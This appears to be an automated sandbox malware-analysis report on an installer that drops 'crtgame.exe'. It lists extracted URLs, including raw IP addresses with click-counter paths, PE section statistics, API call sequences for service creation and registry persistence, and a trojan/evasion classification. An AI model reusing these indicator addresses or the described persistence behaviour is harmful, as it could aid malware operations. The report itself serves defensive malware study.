Source: crtgame.exe, 00000006.00000002.2944456684.0000000000A77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.237.206.129/click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde
Source: crtgame.exe, 00000006.00000002.2945587982.00000000036F6000.00000004.00000020.00020000.00000000.sdmp, crtgame.exe, 00000006.00000002.2944456684.0000000000A77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.237.206.129/click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde
Source: crtgame.exe, 00000006.00000002.2944456684.0000000000A77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.237.206.129/en-US
Source: crtgame.exe, 00000006.00000002.2945587982.00000000036F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.232.249.187/click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde2
Source: is-OMKRE.tmp.1.dr	String found in binary or memory: http://LosslessAudio.org/0
Source: is-MJ59N.tmp.1.dr, is-LTIA8.tmp.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: is-GSP1P.tmp.1.dr, is-83310.tmp.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: is-MJ59N.tmp.1.dr, is-LTIA8.tmp.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: is-GSP1P.tmp.1.dr, is-83310.tmp.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: is-GSP1P.tmp.1.dr, is-83310.tmp.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: is-MJ59N.tmp.1.dr, is-LTIA8.tmp.1.dr	String found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.cer0
Source: is-OGODD.tmp.1.dr	String found in binary or memory: http://code.google.com/p/mp4v2D
Source: is-GSP1P.tmp.1.dr, is-83310.tmp.1.dr	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: is-GSP1P.tmp.1.dr, is-83310.tmp.1.dr	String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: is-GSP1P.tmp.1.dr, is-83310.tmp.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: is-MJ59N.tmp.1.dr, is-LTIA8.tmp.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: is-GSP1P.tmp.1.dr, is-83310.tmp.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: is-GSP1P.tmp.1.dr, is-83310.tmp.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: is-MJ59N.tmp.1.dr, is-LTIA8.tmp.1.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: is-MJ59N.tmp.1.dr, is-LTIA8.tmp.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: is-MJ59N.tmp.1.dr, is-LTIA8.tmp.1.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: is-MJ59N.tmp.1.dr, is-LTIA8.tmp.1.dr	String found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.crl0
Source: is-MJ59N.tmp.1.dr, is-LTIA8.tmp.1.dr	String found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
Source: is-GSP1P.tmp.1.dr, is-83310.tmp.1.dr	String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: is-1CHIA.tmp.1.dr	String found in binary or memory: http://lame.sf.net
Source: is-1CHIA.tmp.1.dr	String found in binary or memory: http://lame.sf.net32bits
Source: is-GRQ3N.tmp.1.dr	String found in binary or memory: http://mingw-w64.sourceforge.net/X
Source: is-GSP1P.tmp.1.dr, is-83310.tmp.1.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: is-GSP1P.tmp.1.dr, is-83310.tmp.1.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: is-GSP1P.tmp.1.dr, is-MJ59N.tmp.1.dr, is-83310.tmp.1.dr, is-LTIA8.tmp.1.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: is-MJ59N.tmp.1.dr, is-LTIA8.tmp.1.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: is-GSP1P.tmp.1.dr, is-83310.tmp.1.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: is-GSP1P.tmp.1.dr, is-83310.tmp.1.dr	String found in binary or memory: http://ocsp.sectigo.com0
Source: is-MJ59N.tmp.1.dr, is-LTIA8.tmp.1.dr	String found in binary or memory: http://ocsps.ssl.com0
Source: is-MJ59N.tmp.1.dr, is-LTIA8.tmp.1.dr	String found in binary or memory: http://ocsps.ssl.com0Q
Source: is-MJ59N.tmp.1.dr, is-LTIA8.tmp.1.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: Mg5bMQ2lWi.tmp, Mg5bMQ2lWi.tmp, 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Mg5bMQ2lWi.tmp.0.dr, is-TGPT7.tmp.1.dr	String found in binary or memory: http://www.innosetup.com/
Source: is-1CHIA.tmp.1.dr	String found in binary or memory: http://www.mp3dev.org/
Source: is-1CHIA.tmp.1.dr	String found in binary or memory: http://www.mp3dev.org/ID3Error
Source: is-DFCBR.tmp.1.dr	String found in binary or memory: http://www.mpg123.de
Source: Mg5bMQ2lWi.exe, 00000000.00000003.1694432779.0000000002340000.00000004.00001000.00020000.00000000.sdmp, Mg5bMQ2lWi.exe, 00000000.00000003.1694597975.0000000002088000.00000004.00001000.00020000.00000000.sdmp, Mg5bMQ2lWi.tmp, Mg5bMQ2lWi.tmp, 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Mg5bMQ2lWi.tmp.0.dr, is-TGPT7.tmp.1.dr	String found in binary or memory: http://www.remobjects.com/ps
Source: Mg5bMQ2lWi.exe, 00000000.00000003.1694432779.0000000002340000.00000004.00001000.00020000.00000000.sdmp, Mg5bMQ2lWi.exe, 00000000.00000003.1694597975.0000000002088000.00000004.00001000.00020000.00000000.sdmp, Mg5bMQ2lWi.tmp, 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Mg5bMQ2lWi.tmp.0.dr, is-TGPT7.tmp.1.dr	String found in binary or memory: http://www.remobjects.com/psU
Source: is-PBK8V.tmp.1.dr	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: is-04UN3.tmp.1.dr	String found in binary or memory: https://gcc.gnu.org/bugs/):
Source: is-OGODD.tmp.1.dr	String found in binary or memory: https://mp4v2.googlecode.com/svn
Source: is-OGODD.tmp.1.dr	String found in binary or memory: https://mp4v2.googlecode.com/svn/trunk
Source: is-OGODD.tmp.1.dr	String found in binary or memory: https://mp4v2.googlecode.com/svn/trunkrepository
Source: is-OGODD.tmp.1.dr	String found in binary or memory: https://mp4v2.googlecode.com/svnrepository
Source: is-GSP1P.tmp.1.dr, is-83310.tmp.1.dr	String found in binary or memory: https://sectigo.com/CPS0
Source: is-EQ4MD.tmp.1.dr	String found in binary or memory: https://streams.videolan.org/upload/
Source: is-MJ59N.tmp.1.dr, is-LTIA8.tmp.1.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: is-MJ59N.tmp.1.dr, is-LTIA8.tmp.1.dr	String found in binary or memory: https://www.ssl.com/repository0

System Summary

PE file has nameless sections

Source: is-M7CIT.tmp.1.dr	Static PE information: section name:
Source: is-M7CIT.tmp.1.dr	Static PE information: section name:
Source: is-J3HC1.tmp.1.dr	Static PE information: section name:
Source: is-J3HC1.tmp.1.dr	Static PE information: section name:
Source: is-C877S.tmp.1.dr	Static PE information: section name:
Source: is-C877S.tmp.1.dr	Static PE information: section name:
Source: is-LTIA8.tmp.1.dr	Static PE information: section name:
Source: is-AT6AE.tmp.1.dr	Static PE information: section name:
Source: is-AT6AE.tmp.1.dr	Static PE information: section name:
Source: is-001GJ.tmp.1.dr	Static PE information: section name:
Source: is-001GJ.tmp.1.dr	Static PE information: section name:
Source: is-MJ59N.tmp.1.dr	Static PE information: section name:
Source: is-3DBAJ.tmp.1.dr	Static PE information: section name:
Source: is-3DBAJ.tmp.1.dr	Static PE information: section name:
Source: is-3DBAJ.tmp.1.dr	Static PE information: section name:
Source: is-P0GV3.tmp.1.dr	Static PE information: section name:
Source: is-P0GV3.tmp.1.dr	Static PE information: section name:
Source: is-C9QMS.tmp.1.dr	Static PE information: section name:
Source: is-C9QMS.tmp.1.dr	Static PE information: section name:
Source: is-C9QMS.tmp.1.dr	Static PE information: section name:
Source: is-40N44.tmp.1.dr	Static PE information: section name:
Source: is-40N44.tmp.1.dr	Static PE information: section name:
Source: is-KR7LG.tmp.1.dr	Static PE information: section name:
Source: is-KR7LG.tmp.1.dr	Static PE information: section name:
Source: is-HVEOK.tmp.1.dr	Static PE information: section name:
Source: is-HVEOK.tmp.1.dr	Static PE information: section name:
Source: is-HVEOK.tmp.1.dr	Static PE information: section name:
Source: is-L705K.tmp.1.dr	Static PE information: section name:
Source: is-L705K.tmp.1.dr	Static PE information: section name:
Source: is-44UDD.tmp.1.dr	Static PE information: section name:
Source: is-44UDD.tmp.1.dr	Static PE information: section name:
Source: is-44UDD.tmp.1.dr	Static PE information: section name:

Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: 1_2_0042F394 NtdllDefWindowProc_A,	1_2_0042F394
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: 1_2_00423B94 NtdllDefWindowProc_A,	1_2_00423B94
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: 1_2_004125E8 NtdllDefWindowProc_A,	1_2_004125E8
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: 1_2_0045678C PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A,	1_2_0045678C
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: 1_2_00477568 NtdllDefWindowProc_A,	1_2_00477568

Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp

Code function: 1_2_0042E7A8: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError,

1_2_0042E7A8

Source: C:\Users\user\Desktop\Mg5bMQ2lWi.exe	Code function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,		0_2_00409448
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: 1_2_00454B00 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,		1_2_00454B00

Source: C:\Users\user\Desktop\Mg5bMQ2lWi.exe	Code function: 0_2_0040840C	0_2_0040840C
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: 1_2_00466ABC	1_2_00466ABC
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: 1_2_0047EFD8	1_2_0047EFD8
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: 1_2_0043D5A4	1_2_0043D5A4
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: 1_2_0046F68C	1_2_0046F68C
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: 1_2_0048C110	1_2_0048C110
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: 1_2_004301D0	1_2_004301D0
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: 1_2_004442C4	1_2_004442C4
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: 1_2_0045E7EC	1_2_0045E7EC
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: 1_2_0045A894	1_2_0045A894
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: 1_2_004449BC	1_2_004449BC
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: 1_2_00468B44	1_2_00468B44
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: 1_2_00434B1C	1_2_00434B1C
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: 1_2_00430D5C	1_2_00430D5C
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: 1_2_00444DC8	1_2_00444DC8
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: 1_2_00484ED4	1_2_00484ED4
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: 1_2_0045101C	1_2_0045101C
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: 1_2_00443D1C	1_2_00443D1C
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: 1_2_00485E08	1_2_00485E08
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: 1_2_00433E18	1_2_00433E18
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: 1_2_02391EE0	1_2_02391EE0
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: 1_2_02391140	1_2_02391140
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: 1_2_023916B0	1_2_023916B0
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Code function: 4_2_00401051	4_2_00401051
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Code function: 4_2_00401CBD	4_2_00401CBD
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Code function: 6_2_02C5BFDE	6_2_02C5BFDE
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Code function: 6_2_02C5BFD9	6_2_02C5BFD9
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Code function: 6_2_02C25F2A	6_2_02C25F2A
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Code function: 6_2_02C2EA19	6_2_02C2EA19
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Code function: 6_2_02C3E085	6_2_02C3E085
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Code function: 6_2_02C428A4	6_2_02C428A4
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Code function: 6_2_02C39964	6_2_02C39964
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Code function: 6_2_02C44919	6_2_02C44919
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Code function: 6_2_02C44E90	6_2_02C44E90
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Code function: 6_2_02C25EB7	6_2_02C25EB7
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Code function: 6_2_02C3D779	6_2_02C3D779
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Code function: 6_2_02C3A71A	6_2_02C3A71A
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Code function: 6_2_02C37F22	6_2_02C37F22
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Code function: 6_2_02C3DC6D	6_2_02C3DC6D

Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Code function: String function: 02C44E20 appears 139 times
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Code function: String function: 02C385C0 appears 37 times
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: String function: 004458F8 appears 59 times
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: String function: 00405964 appears 110 times
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: String function: 00445628 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: String function: 00408C14 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: String function: 00406ACC appears 39 times
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: String function: 00403400 appears 61 times
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: String function: 00433D30 appears 32 times
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: String function: 004078FC appears 43 times
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: String function: 00457114 appears 70 times
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: String function: 00403494 appears 82 times
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: String function: 004529A4 appears 91 times
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: String function: 00403684 appears 218 times
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: String function: 00456F08 appears 91 times

Source: Mg5bMQ2lWi.exe	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: Mg5bMQ2lWi.tmp.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: Mg5bMQ2lWi.tmp.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: Mg5bMQ2lWi.tmp.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: Mg5bMQ2lWi.tmp.0.dr	Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
Source: crtgame.exe.1.dr	Static PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
Source: is-TGPT7.tmp.1.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-TGPT7.tmp.1.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: is-TGPT7.tmp.1.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: is-TGPT7.tmp.1.dr	Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
Source: TAudioClass.exe.4.dr	Static PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79

Source: is-EI90O.tmp.1.dr	Static PE information: Number of sections : 11 > 10
Source: is-GRQ3N.tmp.1.dr	Static PE information: Number of sections : 11 > 10
Source: is-EI0VO.tmp.1.dr	Static PE information: Number of sections : 11 > 10
Source: is-FBHLC.tmp.1.dr	Static PE information: Number of sections : 11 > 10
Source: is-EQ4MD.tmp.1.dr	Static PE information: Number of sections : 11 > 10
Source: is-PBK8V.tmp.1.dr	Static PE information: Number of sections : 18 > 10
Source: is-JB8NH.tmp.1.dr	Static PE information: Number of sections : 11 > 10

Source: Mg5bMQ2lWi.exe, 00000000.00000003.1694432779.0000000002340000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameshfolder.dll~/ vs Mg5bMQ2lWi.exe
Source: Mg5bMQ2lWi.exe, 00000000.00000003.1694597975.0000000002088000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameshfolder.dll~/ vs Mg5bMQ2lWi.exe

Source: Mg5bMQ2lWi.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: crtgame.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: _RegDLL.tmp.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: TAudioClass.exe.4.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: is-M7CIT.tmp.1.dr	Static PE information: Section: ZLIB complexity 0.9964533211297071
Source: is-001GJ.tmp.1.dr	Static PE information: Section: ZLIB complexity 0.9976058467741935
Source: is-3DBAJ.tmp.1.dr	Static PE information: Section: ZLIB complexity 0.995148689516129
Source: is-P0GV3.tmp.1.dr	Static PE information: Section: ZLIB complexity 0.9908203125
Source: is-KR7LG.tmp.1.dr	Static PE information: Section: ZLIB complexity 0.9903624487704918
Source: is-HVEOK.tmp.1.dr	Static PE information: Section: ZLIB complexity 0.9891526442307692

Source: is-GSP1P.tmp.1.dr

Binary or memory string: ?..la..dll.Unknown error %u occurred.sln

Source: classification engine

Classification label: mal100.troj.evad.winEXE@15/128@7/3

Source: C:\Program Files (x86)\CRTGame\crtgame.exe

Code function: 6_2_02C302E0 FormatMessageA,GetLastError,FormatMessageA,GetLastError,

6_2_02C302E0

Source: C:\Users\user\Desktop\Mg5bMQ2lWi.exe	Code function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,		0_2_00409448
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: 1_2_00454B00 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,		1_2_00454B00

Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp

Code function: 1_2_00455328 GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA,

1_2_00455328

Source: C:\Program Files (x86)\CRTGame\crtgame.exe

Code function: lstrcmpiW,GetModuleHandleA,GetModuleFileNameA,GetModuleHandleA,GetModuleFileNameW,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,CreateDirectoryA,CopyFileA,OpenSCManagerA,CreateServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

4_2_00402548

Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp

Code function: 1_2_0046D118 GetVersion,CoCreateInstance,

1_2_0046D118

Source: C:\Users\user\Desktop\Mg5bMQ2lWi.exe

Code function: 0_2_00409BEC FindResourceA,SizeofResource,LoadResource,LockResource,

0_2_00409BEC

Source: C:\Program Files (x86)\CRTGame\crtgame.exe

Code function: 4_2_004026F0 GetModuleHandleA,GetModuleFileNameA,GetCommandLineW,CommandLineToArgvW,GetLocalTime,lstrcmpiW,CreateFileA,CloseHandle,ExitProcess,lstrcmpiW,lstrcmpiW,RegCreateKeyExA,GetTickCount,wsprintfA,RegSetValueExA,RegCloseKey,lstrcmpiW,RegCreateKeyExA,GetTickCount,wsprintfA,RegSetValueExA,RegCloseKey,SetEvent,CreateThread,WaitForSingleObject,ExitProcess,StartServiceCtrlDispatcherA,

4_2_004026F0

Source: C:\Program Files (x86)\CRTGame\crtgame.exe

4_2_004026F0

Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp

File created: C:\Program Files (x86)\CRTGame

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5568:120:WilError_03
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Mutant created: \Sessions\1\BaseNamedObjects\AnyMediaPlayer
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5768:120:WilError_03

Source: C:\Users\user\Desktop\Mg5bMQ2lWi.exe

File created: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp

Jump to behavior

Source: C:\Users\user\Desktop\Mg5bMQ2lWi.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization

Jump to behavior

Source: C:\Program Files (x86)\CRTGame\crtgame.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: is-PBK8V.tmp.1.dr	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: is-PBK8V.tmp.1.dr	Binary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
Source: is-PBK8V.tmp.1.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: is-PBK8V.tmp.1.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: is-PBK8V.tmp.1.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: is-PBK8V.tmp.1.dr	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: is-PBK8V.tmp.1.dr	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: is-PBK8V.tmp.1.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: is-PBK8V.tmp.1.dr	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');

Source: Mg5bMQ2lWi.exe

ReversingLabs: Detection: 55%

Source: C:\Users\user\Desktop\Mg5bMQ2lWi.exe

File read: C:\Users\user\Desktop\Mg5bMQ2lWi.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Mg5bMQ2lWi.exe "C:\Users\user\Desktop\Mg5bMQ2lWi.exe"
Source: C:\Users\user\Desktop\Mg5bMQ2lWi.exe	Process created: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp "C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp" /SL5="$1043A,6985375,54272,C:\Users\user\Desktop\Mg5bMQ2lWi.exe"
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /Query
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
